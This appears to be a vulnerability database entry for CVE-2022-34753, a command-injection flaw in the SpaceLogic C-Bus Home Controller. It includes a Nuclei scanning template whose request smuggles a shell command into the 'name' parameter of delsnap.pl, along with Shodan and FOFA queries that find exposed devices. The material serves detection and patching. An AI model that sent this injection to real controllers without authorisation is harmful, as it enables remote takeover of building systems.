8.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
9.1 High
AI Score
Confidence
High
0.971 High
EPSS
Percentile
99.8%
SpaceLogic C-Bus Home Controller through 1.31.460 is susceptible to remote command execution via improper neutralization of special elements. Remote root exploit can be enabled when the command is compromised, and an attacker can potentially execute malware, obtain sensitive information, modify data, and/or gain full control without entering necessary credentials.
id: CVE-2022-34753
info:
name: SpaceLogic C-Bus Home Controller <=1.31.460 - Remote Command Execution
author: gy741
severity: high
description: |
SpaceLogic C-Bus Home Controller through 1.31.460 is susceptible to remote command execution via improper neutralization of special elements. Remote root exploit can be enabled when the command is compromised, and an attacker can potentially execute malware, obtain sensitive information, modify data, and/or gain full control without entering necessary credentials.
impact: |
Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the affected system.
remediation: |
Upgrade SpaceLogic C-Bus Home Controller to a version higher than 1.31.460 to mitigate this vulnerability.
reference:
- https://www.zeroscience.mk/codes/SpaceLogic.txt
- https://download.schneider-electric.com/files?p_enDocType=Security+and+Safety+Notice&p_File_Name=SEVD-2022-193-02_SpaceLogic-C-Bus-Home-Controller-Wiser_MK2_Security_Notification.pdf
- http://packetstormsecurity.com/files/167783/Schneider-Electric-SpaceLogic-C-Bus-Home-Controller-5200WHC2-Remote-Root.html
- https://nvd.nist.gov/vuln/detail/CVE-2022-34753
- https://github.com/nomi-sec/PoC-in-GitHub
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.8
cve-id: CVE-2022-34753
cwe-id: CWE-78
epss-score: 0.96923
epss-percentile: 0.99698
cpe: cpe:2.3:o:schneider-electric:spacelogic_c-bus_home_controller_firmware:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: schneider-electric
product: spacelogic_c-bus_home_controller_firmware
shodan-query:
- html:"SpaceLogic C-Bus"
- http.html:"spacelogic c-bus"
fofa-query: body="spacelogic c-bus"
tags: cve2022,cve,iot,spacelogic,rce,oast,packetstorm,schneider-electric
http:
- raw:
- |
GET /delsnap.pl?name=|id HTTP/1.1
Host: {{Hostname}}
Authorization: Basic {{base64('{{username}}:' + '{{password}}')}}
matchers-condition: and
matchers:
- type: regex
regex:
- 'uid=\d+\(([^)]+)\) gid=\d+\(([^)]+)\)'
- type: status
status:
- 200
# digest: 4a0a00473045022100e51e19ab76992c06a62929cffe12436bdf0e8374d90c51f634b6db43851b5dcc02206a88b47ef090adb9868871e07dcb7afb99c5fef318f45e379e602cdca16f9196:922c64590222798bb761d5b6d8e72950
packetstormsecurity.com/files/167783/Schneider-Electric-SpaceLogic-C-Bus-Home-Controller-5200WHC2-Remote-Root.html
download.schneider-electric.com/files?p_enDocType=Security+and+Safety+Notice&p_File_Name=SEVD-2022-193-02_SpaceLogic-C-Bus-Home-Controller-Wiser_MK2_Security_Notification.pdf
github.com/nomi-sec/PoC-in-GitHub
nvd.nist.gov/vuln/detail/CVE-2022-34753
www.zeroscience.mk/codes/SpaceLogic.txt
8.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
9.1 High
AI Score
Confidence
High
0.971 High
EPSS
Percentile
99.8%